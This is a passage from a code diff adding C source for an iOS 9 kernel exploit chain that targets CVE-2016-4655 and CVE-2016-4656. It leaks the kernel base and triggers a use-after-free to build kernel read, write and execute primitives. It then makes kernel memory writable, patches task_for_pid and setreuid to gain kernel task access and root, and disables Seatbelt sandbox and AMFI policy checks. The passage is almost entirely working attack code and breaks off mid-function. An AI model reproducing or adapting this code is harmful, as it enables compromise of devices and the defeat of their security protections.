+  memcpy_func((void *)(((unsigned int)&stackAnchor & 0xFFFFF000) | 0xEEC), pExploit, 128);
+
+  *(uint32_t *)(args[1]) = payload_ptr;
+
+  asm_syscall(SYS_open_extended, (long)lockfile, O_WRONLY | O_EXLOCK, KAUTH_UID_NONE, KAUTH_GID_NONE, 0644, (long)(p + 0xEC0));
+  return NULL;
+
+}
+
+
+uint32_t read_primitive(uint32_t addr) {
+    int attr;
+    unsigned int attrCnt;
+    
+    return clock_get_attributes_func(clk_battery, addr, &attr, (mach_msg_type_number_t)&attrCnt);
+}
+
+void exec_primitive(uint32_t fct, uint32_t arg1, uint32_t arg2) {
+    int attr;
+    unsigned int attrCnt;
+    char data[64];
+    
+    write_func(fildes[1], "AAAABBBB", 8);
+    write_func(fildes[1], &arg1, 4);
+    write_func(fildes[1], &arg2, 4);
+    write_func(fildes[1], &fct, 4);
+    clock_get_attributes_func(clk_realtime, pipebuf, &attr, (mach_msg_type_number_t)&attrCnt);
+    
+    read_func(fildes[0], data, 64);
+}
+
+void write_primitive(uint32_t addr, uint32_t value) {
+    addr -= 0xc;
+    exec_primitive(write_gadget, addr, value);
+}
+
+void patch_kernel_pmap(uint32_t kernel_base) {
+    uint32_t kernel_pmap = find_kernel_pmap() + kernel_base;
+    uint32_t kernel_pmap_store = read_primitive(kernel_pmap);
+    uint32_t tte_virt = read_primitive(kernel_pmap_store);
+    uint32_t tte_phys = read_primitive(kernel_pmap_store+4);
+    
+    /*printf("kernel pmap store @ 0x%08x\n", kernel_pmap_store);*/
+    /*printf("kernel pmap tte is at VA 0x%08x PA 0x%08x\n", tte_virt, tte_phys);*/
+    
+    /* every page is writable */
+    uint32_t i;
+    uint32_t j;
+    for (i=0; i<TTB_SIZE; i++) {
+        uint32_t addr = tte_virt+(i<<2);
+        uint32_t entry = read_primitive(addr);
+        if ((entry & L1_PAGE_PROTO) == L1_PAGE_PROTO) {
+            uint32_t page_entry = ((entry & L1_COARSE_PT) - tte_phys) + tte_virt;
+            for (j=0; j<PT_SIZE; j++) {
+                uint32_t addr2 = page_entry+(j<<2);
+                uint32_t entry2 = read_primitive(addr2);
+                if (entry2) {
+                    uint32_t new_entry2 = (entry2 & (~L2_PAGE_APX));
+                    write_primitive(addr2, new_entry2);
+                }
+            }
+        } else if ((entry & L1_SECT_PROTO) == L1_SECT_PROTO) {
+            uint32_t new_entry = L1_PROTO_TTE(entry);
+            new_entry &= ~L1_SECT_APX;
+            write_primitive(addr, new_entry);
+        }
+    }
+    
+    uint32_t flush_dcache = find_flush_dcache() + kernel_base;
+    exec_primitive(flush_dcache, 0, 0);
+    
+    uint32_t invalidate_tlb = find_invalidate_tlb() + kernel_base;
+    exec_primitive(invalidate_tlb, 0, 0);
+}
+
+void patch_task_for_pid(uint32_t kernel_base) {
+    uint32_t task_for_pid_base = find_task_for_pid() + kernel_base;
+    
+    uint32_t pid_check_addr = find_pid_check() + task_for_pid_base;
+    write_primitive(pid_check_addr, read_primitive(pid_check_addr) + 0xff); // cmp r6, #ff
+    
+    uint32_t posix_check_ret_addr = find_posix_check() + task_for_pid_base;
+    write_primitive(posix_check_ret_addr, read_primitive(posix_check_ret_addr) + 0xff); // cmp r0, #ff
+    
+    uint32_t mac_proc_check_ret_addr = find_mac_proc_check() + task_for_pid_base;
+    write_primitive(mac_proc_check_ret_addr, read_primitive(mac_proc_check_ret_addr) | 0x10000); // cmp.w r8, #1
+}
+
+// from patchfinder.c
+static int insn_is_32bit(uint16_t * i)
+{
+    return (*i & 0xe000) == 0xe000 && (*i & 0x1800) != 0x0;
+}
+
+static uint32_t bit_range(uint32_t x, int start, int end)
+{
+    x = (x << (31 - start)) >> (31 - start);
+    x = (x >> end);
+    return x;
+}
+
+static uint32_t decode_immed(uint32_t instruction)
+{
+    uint32_t immed16 = 0;
+    immed16 |= bit_range(instruction, 24, 16) << 0;
+    immed16 |= bit_range(instruction, 5, 0) << 12;
+    immed16 |= bit_range(instruction, 10, 10) << 11;
+    immed16 |= bit_range(instruction, 31, 28) << 8;
+    return immed16;
+}
+
+static unsigned char *
+boyermoore_horspool_memmem(const unsigned char* haystack, size_t hlen,
+                           const unsigned char* needle,   size_t nlen)
+{
+    size_t last, scan = 0;
+    size_t bad_char_skip[UCHAR_MAX + 1]; /* Officially called:
+                                          * bad character shift */
+
+    /* Sanity checks on the parameters */
+    if (nlen <= 0 || !haystack || !needle)
+        return NULL;
+
+    /* ---- Preprocess ---- */
+    /* Initialize the table to default value */
+    /* When a character is encountered that does not occur
+     * in the needle, we can safely skip ahead for the whole
+     * length of the needle.
+     */
+    for (scan = 0; scan <= UCHAR_MAX; scan = scan + 1)
+        bad_char_skip[scan] = nlen;
+
+    /* C arrays have the first byte at [0], therefore:
+     * [nlen - 1] is the last byte of the array. */
+    last = nlen - 1;
+
+    /* Then populate it with the analysis of the needle */
+    for (scan = 0; scan < last; scan = scan + 1)
+        bad_char_skip[needle[scan]] = last - scan;
+
+    /* ---- Do the matching ---- */
+
+    /* Search the haystack, while the needle can still be within it. */
+    while (hlen >= nlen)
+    {
+        /* scan from the end of the needle */
+        for (scan = last; haystack[scan] == needle[scan]; scan = scan - 1)
+            if (scan == 0) /* If the first byte matches, we've found it. */
+                return (void *)haystack;
+
+        /* otherwise, we need to skip some bytes and start again.
+           Note that here we are getting the skip value based on the last byte
+           of needle, no matter where we didn't match. So if needle is: "abcd"
+           then we are skipping based on 'd' and that value will be 4, and
+           for "abcdd" we again skip on 'd' but the value will be only 1.
+           The alternative of pretending that the mismatched character was
+           the last character is slower in the normal case (E.g. finding
+           "abcd" in "...azcd..." gives 4 by using 'd' but only
+           4-2==2 using 'z'. */
+        hlen     -= bad_char_skip[haystack[last]];
+        haystack += bad_char_skip[haystack[last]];
+    }
+
+    return NULL;
+}
+
+void init_exploit(void * dlsym_addr, void * dlopen_addr)
+{
+  dlopen_func = dlopen_addr;
+  dlsym_func = dlsym_addr;
+
+  // Lookup functions
+  void* libsystem = dlopen_func("/usr/lib/libSystem.B.dylib", RTLD_NOW);
+
+#ifdef DEBUG
+  typedef int (*asl_log_ptr)(aslclient asl, aslmsg msg, int level, const char *format, ...);
+  asl_log_ptr asl_log_func = dlsym_func(libsystem, "asl_log");
+#endif
+
+  typedef void* (*memcpy_ptr)( void * destination, const void * source, size_t num);
+  memcpy_ptr memcpy_func = dlsym_func(libsystem, "memcpy");
+
+  void* libIOKit = dlopen_func("/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit", RTLD_NOW);
+
+  typedef CFMutableDictionaryRef (*IOServiceMatching_ptr)(const char *name);
+  IOServiceMatching_ptr IOServiceMatching_func = dlsym_func(libIOKit, "IOServiceMatching");
+
+  typedef io_service_t (*IOServiceGetMatchingService_ptr)(mach_port_t masterPort, CFDictionaryRef matching);
+  IOServiceGetMatchingService_ptr IOServiceGetMatchingService_func = dlsym_func(libIOKit, "IOServiceGetMatchingService");
+
+  typedef mach_port_t (*mach_task_self_ptr)();
+  mach_task_self_ptr mach_task_self_func = dlsym_func(libIOKit, "mach_task_self");
+
+  typedef kern_return_t (*io_service_open_extended_ptr)(mach_port_t service, task_t owningTask, uint32_t connect_type, NDR_record_t ndr, io_buf_ptr_t properties, mach_msg_type_number_t propertiesCnt, kern_return_t *result, mach_port_t *connection);
+  io_service_open_extended_ptr io_service_open_extended_func = dlsym_func(libIOKit, "io_service_open_extended");
+
+  typedef kern_return_t (*IORegistryEntryGetChildIterator_ptr)(io_registry_entry_t entry, const io_name_t plane, io_iterator_t *iterator);
+  IORegistryEntryGetChildIterator_ptr IORegistryEntryGetChildIterator_func = dlsym_func(libIOKit, "IORegistryEntryGetChildIterator");
+
+  typedef kern_return_t (*IOObjectRelease_ptr)(io_object_t object);
+  IOObjectRelease_ptr IOObjectRelease_func = dlsym_func(libIOKit, "IOObjectRelease");
+
+  typedef io_object_t (*IOIteratorNext_ptr)(io_iterator_t iterator);
+  IOIteratorNext_ptr IOIteratorNext_func = dlsym_func(libIOKit, "IOIteratorNext");
+
+  typedef kern_return_t (*IORegistryEntryGetProperty_ptr)(io_registry_entry_t entry, const io_name_t propertyName, io_struct_inband_t buffer, uint32_t *size);
+  IORegistryEntryGetProperty_ptr IORegistryEntryGetProperty_func = dlsym_func(libIOKit, "IORegistryEntryGetProperty");
+
+  clock_get_attributes_func = dlsym_func(libsystem, "clock_get_attributes");
+  read_func = dlsym_func(libsystem, "read");
+  write_func = dlsym_func(libsystem, "write");
+
+  DLSYM_FUNC(malloc, libsystem, void*, size_t)
+  DLSYM_FUNC(free, libsystem, void*)
+  DLSYM_FUNC(getenv, libsystem, char*, const char*)
+  DLSYM_FUNC(strcpy, libsystem, char*, char*, const char*)
+  DLSYM_FUNC(strcat, libsystem, char*, char*, const char*)
+  DLSYM_FUNC(strlen, libsystem, size_t, const char*)
+  DLSYM_FUNC(open, libsystem, int, const char*, int flags, mode_t mode)
+  DLSYM_FUNC(flock, libsystem, int, int fd, int operation)
+  DLSYM_FUNC(pipe, libsystem, int, int* pipefd)
+  DLSYM_FUNC(mach_host_self, libsystem, host_name_port_t)
+  DLSYM_FUNC(host_get_clock_service, libsystem, kern_return_t, host_t host, clock_id_t id, clock_t clock_name)
+  DLSYM_FUNC(host_get_io_master, libsystem, kern_return_t, host_t host, io_master_t *io_master)
+  DLSYM_FUNC(io_service_get_matching_services_bin, libIOKit, kern_return_t, mach_port_t, char*, int, void*)
+
+  DLSYM_FUNC(pthread_create, libsystem, int, pthread_t *thread, const pthread_attr_t *attr, void *(*start_routine) (void *), void *arg);
+  DLSYM_FUNC(sleep, libsystem, unsigned int, unsigned int);
+  DLSYM_FUNC(fstat, libsystem, int, int fildes, struct stat *buf);
+  DLSYM_FUNC(setreuid, libsystem, int, uid_t ruid, uid_t euid);
+  DLSYM_FUNC(getuid, libsystem, uid_t);
+
+  DLSYM_FUNC(uname, libsystem, int, struct utsname *buf);
+  DLSYM_FUNC(sysctl, libsystem, int, int *name, u_int namelen, void *oldp, size_t *oldlenp, void *newp, size_t newlen);
+
+  DLSYM_FUNC(task_for_pid, libsystem, kern_return_t, mach_port_name_t target_tport, int pid, mach_port_name_t *t);
+  DLSYM_FUNC(vm_write, libsystem, kern_return_t, vm_map_t target_task, vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
+  DLSYM_FUNC(vm_read_overwrite, libsystem, kern_return_t, vm_map_t target_task, vm_address_t address, vm_size_t size, vm_address_t data, vm_size_t *outsize);
+
+  DLSYM_FUNC(socket, libsystem, int, int, int, int);
+  DLSYM_FUNC(connect, libsystem, int, int sockfd, const struct sockaddr *addr, socklen_t addrlen);
+  DLSYM_FUNC(send, libsystem, ssize_t, int sockfd, const void *buf, size_t len, int flags);
+  DLSYM_FUNC(recv, libsystem, ssize_t, int sockfd, const void *buf, size_t len, int flags);
+  DLSYM_FUNC(close, libsystem, int, int fd);
+  DLSYM_FUNC(unlink, libsystem, int, const char* file);
+
+  // Init
+  const char *lock_last_path_component = "/tmp/lock";
+  char *home = getenv_func("HOME");
+
+  size_t locklen = strlen_func(home) + strlen_func(lock_last_path_component) + 1;
+  lockfile = malloc_func(locklen);
+  strcpy_func(lockfile, home);
+  strcat_func(lockfile, lock_last_path_component);
+
+  fd = open_func(lockfile, O_CREAT | O_WRONLY, 0644);
+
+  flock_func(fd, LOCK_EX);
+  pipe_func(fildes);
+
+  struct utsname systeminfo;
+  uname_func(&systeminfo);
+
+  debug_print("Found device: %s\n", systeminfo.machine);
+
+  char osname[32];
+  size_t s = sizeof(osname);
+  int cmd[2] = { CTL_KERN, KERN_OSVERSION };
+  if(sysctl_func(cmd, sizeof(cmd) / sizeof(*cmd), osname, &s, NULL, 0) != 0) {
+    debug_print("%s\n", "Could not detect device version");
+    return;
+  }
+
+  bool pre91 = false;
+  const char* osversion = 0;
+  debug_print("Found version: %s\n", osname);
+  if (osname[2] == 'A') {
+    osversion = "9.0.2";
+    pre91 = true;
+  } else if (osname[2] == 'B') {
+    osversion = "9.1";
+  } else if (osname[2] == 'C') {
+    osversion = "9.2";
+  } else if (osname[2] == 'D') {
+    osversion = "9.2.1";
+  } else if (osname[2] == 'E') {
+    osversion = "9.3";
+  } else if (osname[2] == 'F') {
+    osversion = "9.3.2";
+  } else if (osname[2] == 'G') {
+    osversion = "9.3.3";
+  } else {
+    debug_print("%s\n", "Unsupported version");
+    return;
+  }
+
+  debug_print("Guessed version for offsets: %s\n", osversion);
+  target_environment = info_to_target_environment(systeminfo.machine, osversion);
+  if (!target_environment) {
+    debug_print("%s\n", "Unsupported version");
+    return;
+  }
+
+
+
+
+  kern_return_t kr;
+  kr = host_get_clock_service_func(mach_host_self_func(), CALENDAR_CLOCK, (clock_t)&clk_battery);
+  if (kr != 0) {
+    debug_print("%s\n", "clk_battery fail");
+    return;
+  }
+
+  kr = host_get_clock_service_func(mach_host_self_func(), REALTIME_CLOCK, (clock_t)&clk_realtime);
+  if (kr != 0) {
+    debug_print("%s\n", "clk_realtime fail");
+    return;
+  }
+ 
+  // CVE-2016-4655
+  char data[4096];
+  uint32_t bufpos = 0;
+
+  memcpy_func(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature));
+  bufpos += sizeof(kOSSerializeBinarySignature);
+
+  WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 2);
+
+  WRITE_IN(data, kOSSerializeSymbol | 30);
+  WRITE_IN(data, 0x4b444948); // "HIDKeyboardModifierMappingSrc"
+  WRITE_IN(data, 0x6f627965);
+  WRITE_IN(data, 0x4d647261);
+  WRITE_IN(data, 0x6669646f);
+  WRITE_IN(data, 0x4d726569);
+  WRITE_IN(data, 0x69707061);
+  WRITE_IN(data, 0x7253676e);
+  WRITE_IN(data, 0x00000063);
+  WRITE_IN(data, kOSSerializeNumber | 2048);
+  WRITE_IN(data, 0x00000004);
+  WRITE_IN(data, 0x00000000);
+
+  WRITE_IN(data, kOSSerializeSymbol | 30);
+  WRITE_IN(data, 0x4b444948); // "HIDKeyboardModifierMappingDst"
+  WRITE_IN(data, 0x6f627965);
+  WRITE_IN(data, 0x4d647261);
+  WRITE_IN(data, 0x6669646f);
+  WRITE_IN(data, 0x4d726569);
+  WRITE_IN(data, 0x69707061);
+  WRITE_IN(data, 0x7344676e);
+  WRITE_IN(data, 0x00000074);
+  WRITE_IN(data, kOSSerializeNumber | kOSSerializeEndCollecton | 32);
+  WRITE_IN(data, 0x00000193);
+  WRITE_IN(data, 0X00000000);
+
+  CFMutableDictionaryRef amfi = IOServiceMatching_func("AppleMobileFileIntegrity");
+  io_service_t service = IOServiceGetMatchingService_func(0, amfi);
+  io_connect_t connection;
+  kern_return_t result;
+
+  NDR_record_t* NDR_record_lookup = dlsym_func(libIOKit, "NDR_record");
+  io_service_open_extended_func(service, mach_task_self_func(), 0, *NDR_record_lookup, data, bufpos, &result, &connection);
+  if (result != KERN_SUCCESS) {
+    debug_print("%s\n", "io_service_open_extended fail");
+    return;
+  }
+
+  io_object_t object = 0;
+  uint32_t size = sizeof(data);
+  io_iterator_t iterator;
+  IORegistryEntryGetChildIterator_func(service, "IOService", &iterator);
+
+  do {
+    if (object) {
+      IOObjectRelease_func(object);
+    }
+    object = IOIteratorNext_func(iterator);
+  } while (IORegistryEntryGetProperty_func(object, "HIDKeyboardModifierMappingSrc", data, &size));
+
+  uint32_t kernel_base = 0;
+  if (size > 8) {
+    kernel_base = (*(uint32_t *)(data+36) & 0xFFF00000) + 0x1000;
+  }
+
+  debug_print("found kernel_base %p!\n", (void*)kernel_base);
+
+
+  // CVE-2016-4656
+  pthread_t insert_payload_thread;
+  volatile uint32_t payload_ptr = 0x12345678;
+  uint32_t args[] = {kernel_base, (uint32_t)&payload_ptr};
+
+  mach_port_t master = 0, res;
+  struct stat buf;
+  mach_port_name_t kernel_task;
+
+  pthread_create_func(&insert_payload_thread, NULL, &insert_payload, args);
+
+  while (payload_ptr == 0x12345678);
+  sleep_func(1);
+
+  memcpy_func(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature));
+  bufpos = sizeof(kOSSerializeBinarySignature);
+
+
+  WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 0x10);
+  if (pre91)
+  {
+    /* pre-9.1 doesn't accept strings as keys, but duplicate keys :D */
+    WRITE_IN(data, kOSSerializeSymbol | 4);
+    WRITE_IN(data, 0x00327973); // "sy2"
+    /* our key is a OSString object that will be freed */
+    WRITE_IN(data, kOSSerializeString | 4);
+    WRITE_IN(data, 0x00327973); // irrelevant
+
+    /* now this will free the string above */
+    WRITE_IN(data, kOSSerializeObject | 1); // ref to "sy2"
+    WRITE_IN(data, kOSSerializeBoolean | 1); // lightweight value
+
+    /* and this is the key for the value below */
+    WRITE_IN(data, kOSSerializeObject | 1); // ref to "sy2" again
+  }
+  else
+  {
+    /* our key is a OSString object that will be freed */
+    WRITE_IN(data, kOSSerializeString | 4);
+    WRITE_IN(data, 0x00327973); // "sy2"
+  }
+  WRITE_IN(data, kOSSerializeData | 0x14);
+  WRITE_IN(data, payload_ptr+PAYLOAD_TO_PEXPLOIT+PEXPLOIT_TO_UAF_PAYLOAD); // [00] address of uaf_payload_buffer
+  WRITE_IN(data, 0x41414141);                                              // [04] dummy
+  WRITE_IN(data, payload_ptr+PAYLOAD_TO_PEXPLOIT);                         // [08] address of uaf_payload_buffer - 8
+  WRITE_IN(data, 0x00000014);                                              // [0C] static value of 20
+  WRITE_IN(data, kernel_base+find_OSSerializer_serialize()+1);             // [10] address of OSSerializer::serialize (+1)
+
+  /* now create a reference to object 1 which is the OSString object that was just freed */
+  WRITE_IN(data, kOSSerializeObject | kOSSerializeEndCollecton | (pre91 ? 2 : 1));
+
+  /* get a master port for IOKit API */
+  host_get_io_master_func(mach_host_self_func(), &master);
+
+  /* trigger the bug */
+  kr = io_service_get_matching_services_bin_func(master, data, bufpos, &res);
+
+  /* test read primitive */
+  uint32_t kernel_header = read_primitive(kernel_base);
+  debug_print("kernel_header = %p!\n", (void*)kernel_header);
+
+  vm_kernel_addrperm = read_primitive(kernel_base+find_vm_kernel_addrperm());
+
+  /* pipe test */
+  fstat_func(fildes[0], &buf);
+  cpipe = (uint32_t)(buf.st_ino - vm_kernel_addrperm);
+
+  write_func(fildes[1], "ABCDEFGH", 8);
+  read_primitive(cpipe);
+  pipebuf = read_primitive(cpipe+16);
+  if (read_primitive(pipebuf) != 0x44434241) { // "ABCD" 
+    debug_print("%s\n", "read_primitive fail");
+    return;
+  }
+  if (read_primitive(pipebuf+4) != 0x48474645) { // "EFGH"
+    debug_print("%s\n", "read_primitive fail");
+    return;
+  }
+
+  read_func(fildes[0], data, 4096);
+
+  /* test write primitive */
+  write_gadget = kernel_base + find_write_gadget();
+
+  write_primitive(pipebuf, 0x41424142);
+  if (read_primitive(pipebuf) != 0x41424142) {
+    debug_print("%s\n", "read_primitive fail");
+    return;
+  }
+
+  /* patch kernel pmap */
+  patch_kernel_pmap(kernel_base);
+
+  /* test kernel pmap patch */
+  write_primitive(kernel_base, 0x41424142);
+  kernel_header = read_primitive(kernel_base);
+  debug_print("kernel_header = %p!\n", (void*)kernel_header);
+  write_primitive(kernel_base, 0xfeedface);
+  kernel_header = read_primitive(kernel_base);
+  debug_print("kernel_header = %p!\n", (void*)kernel_header);
+    
+  kr = task_for_pid_func(mach_task_self_func(), 0, &kernel_task);
+  if (kr != 0) {
+    debug_print("%s\n", "patching task_for_pid!");
+    patch_task_for_pid(kernel_base);
+    sleep_func(1);
+    kr = task_for_pid_func(mach_task_self_func(), 0, &kernel_task);
+    if (kr != 0) {
+      debug_print("%s\n", "tfp0 fail");
+      return;
+    }
+  } else {
+    debug_print("%s\n", "tfp0 win!");
+  }
+
+  /* test kernel task port */
+  char* kbase = malloc_func(0x1000);
+  if (kbase == 0) {
+    debug_print("%s\n", "malloc fail");
+    return;
+  }
+  vm_size_t memsize;
+  kr = vm_read_overwrite_func(kernel_task, kernel_base, 0x1000, (vm_address_t)kbase, &memsize);
+  if (kr != 0) {
+    debug_print("%s\n", "vm_read fail");
+    return;
+  }
+  mach_header_t *mh=(struct mach_header *)kbase;
+  if(mh->magic != 0xfeedface) {
+    debug_print("%s\n", "magic fail");
+    return;
+  }
+
+  /* patch setreuid */
+  debug_print("getuid() = %d!\n", getuid_func());
+  /*assert(getuid() != 0);*/
+  uint32_t setreuid_base = find_setreuid() + kernel_base;
+  uint32_t branch_addr = 0x3e + setreuid_base;
+  ushort new_branch = find_setreuid_cred_update(); // b loc_802aaa2c
+  vm_write_func(kernel_task, branch_addr, (vm_address_t)&new_branch, 2);
+
+  sleep_func(1);
+
+  /*assert(setreuid(0, 0) == 0);*/
+  setreuid_func(0, 0);
+
+  /* got root? */
+  debug_print("getuid() = %d!\n", getuid_func());
+  /*assert(getuid() == 0);*/
+
+  uint32_t kernel_start = 0xffffffff;
+  uint32_t kernel_end = 0;
+  
+  debug_print("ncmds = %d!\n", mh->ncmds);
+  struct load_command *lc=(struct load_command *)(mh+1);
+  for (int i=0;i<mh->ncmds; i++) {
+    if (lc->cmd == LC_SEGMENT_T) {
+      struct segment_command *sc = (struct segment_command*)lc;
+      debug_print("found segment %s!\n", sc->segname);
+      if (sc->vmaddr < kernel_start) {
+        kernel_start = sc->vmaddr;
+      }
+      if (sc->vmaddr+sc->vmsize > kernel_end) {
+        kernel_end = sc->vmaddr+sc->vmsize;
+      }
+    }
+    lc=(struct load_command*)(((char *)lc)+lc->cmdsize);
+  }
+
+  size_t kernel_size = (kernel_end - kernel_start);
+  debug_print("kernel start %p, end %p, size %p!\n", (void*)kernel_start, (void*)kernel_end, (void*)(kernel_size));
+  free_func(kbase);
+
+  vm_address_t kdata = (vm_address_t)malloc_func(kernel_size);
+  for (int i=0; (i<<12)<kernel_size; i++) {
+      vm_read_overwrite_func(kernel_task, kernel_base+(i<<12), 4096, kdata+(i<<12), &memsize);
+  }
+
+  debug_print("kdata %p, end %p, size %p!\n", (void*)kdata, (void*)(kdata + kernel_size), (void*)(kernel_size));
+  uint8_t *seatbeltstr = boyermoore_horspool_memmem((unsigned char*)kdata, kernel_size, (uint8_t *)"Seatbelt sandbox policy", sizeof("Seatbelt sandbox policy") - 1);
+  if (!seatbeltstr) {
+    debug_print("%s\n", "seatbelt fail");
+    return;
+  }
+  uint32_t what = (uint32_t)(seatbeltstr - kdata) + kernel_start;
+  uint32_t sbops = 0;
+  for (uint32_t off = 0; off < kernel_size; off += 4) {
+    if (*(uint32_t*)(kdata + off) == what) {
+      sbops = *(uint32_t*)(kdata + off + 12);
+      debug_print("sbops found %p\n", (void*)(sbops));
+      break;
+    }
+  }
+
+  /* fixes kernel[0] <Notice>: Sandbox: com.apple.WebKit(180) deny(1) file-read-data /private/var/root/log.dylib*/
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_file_check_mmap), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_access), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_chroot), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_create), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_deleteextattr), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_exchangedata), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_exec), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getattrlist), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getextattr), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_ioctl), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_link), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_listextattr), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_open), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_readlink), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setattrlist), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setextattr), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setflags), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setmode), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setowner), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setutimes), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setutimes), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_stat), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_truncate), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_unlink), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_notify_create), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_fsgetpath), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getattr), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_mount_check_stat), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_proc_check_fork), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_iokit_check_get_property), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_accept), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_accepted), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_bind), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_connect), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_create), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_label_update), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_listen), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_receive), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_received), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_select), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_send), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_stat), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_setsockopt), 0);
+  write_primitive(sbops+offsetof(struct mac_policy_ops, mpo_socket_check_getsockopt), 0);
+
+  uint8_t *amfistr = boyermoore_horspool_memmem((unsigned char*)kdata, kernel_size, (uint8_t *)"Apple Mobile File Integrity", sizeof("Apple Mobile File Integrity") - 1);
+  if (!amfistr) {
+    debug_print("%s\n", "amfistr fail");
+    return;
+  }
+  uint32_t amfiwhat = (uint32_t)(amfistr - kdata) + kernel_start;
+  uint32_t amfiops = 0;
+  for (uint32_t off = 0; off < kernel_size; off += 4) {
+    if (*(uint32_t*)(kdata + off) == amfiwhat) {
+      debug_print("amfiops found %p\n", (void*)(kdata + off));
+      amfiops = *(uint32_t*)(kdata + off + 12);
+      break;
+    }
+  }
+  write_primitive(amfiops+offsetof(struct mac_policy_ops, mpo_file_check_mmap), 0);
+  
+  uint8_t *amfidriverstr = boyermoore_horspool_memmem((unsigned char*)kdata, kernel_size, (uint8_t *)"com.apple.driver.AppleMobileFileIntegrity", sizeof("com.apple.driver.AppleMobileFileIntegrity") - 1);
+  /*uint32_t cs_enforce_maybe = (amfidriverstr - kdata) + kernel_start + 0xb0;*/
+  /*write_primitive(cs_enforce_maybe, 1);*/
+
+  debug_print("amfidriverstr found %p\n", (void*)(amfidriverstr));
+  uint32_t* amfi_macho = (uint32_t*)((uint32_t)amfidriverstr & 0xfffff000);
+  uint32_t amfi_macho_start = 0;
+  while (amfi_macho > (uint32_t*)kdata) {
+    if (*amfi_macho == MH_MAGIC) {
+      debug_print("amfimacho found %p\n", (void*)((uint32_t)amfi_macho - (uint32_t)kdata));
+      amfi_macho_start = ((uint32_t)amfi_macho - (uint32_t)kdata);
+      break;
+    }
+    amfi_macho = (void*)((uint32_t)amfi_macho - 0x1000);
+  }
+
+  uint32_t memcmp_what = kernel_start + find_memcmp() + 1;
+  debug_print("memcmp_what %p\n", (void*)(memcmp_what));
+  uint32_t amfi_memcmp_off;
+  for (amfi_memcmp_off = amfi_macho_start; amfi_memcmp_off < kernel_size; amfi_memcmp_off += 4) {
+    if (*(uint32_t*)((uint32_t)kdata + amfi_memcmp_off) == memcmp_what) {
+      break;
+    }
+  }
+  debug_print("amfi_memcmp_off %p\n", (void*)(amfi_memcmp_off));
+
+  uint32_t amfi_memcmp_stub_found;
+  for (uint32_t amfi_memcmp_stub = amfi_macho_start; amfi_memcmp_stub < kernel_size - 16; amfi_memcmp_stub += 2) {
+    if ((*(uint16_t*)((uint32_t)kdata + amfi_memcmp_stub + 8) == 0x44fc) &&      // add ip, pc
+        (*(uint32_t*)((uint32_t)kdata + amfi_memcmp_stub + 10) == 0xc000f8dc) && // ldr.w ip, [ip]
+        (*(uint16_t*)((uint32_t)kdata + amfi_memcmp_stub + 14) == 0x4760)) {     // bx ip
+
+      uint32_t instruction1 = *(uint32_t*)((uint32_t)kdata + amfi_memcmp_stub);
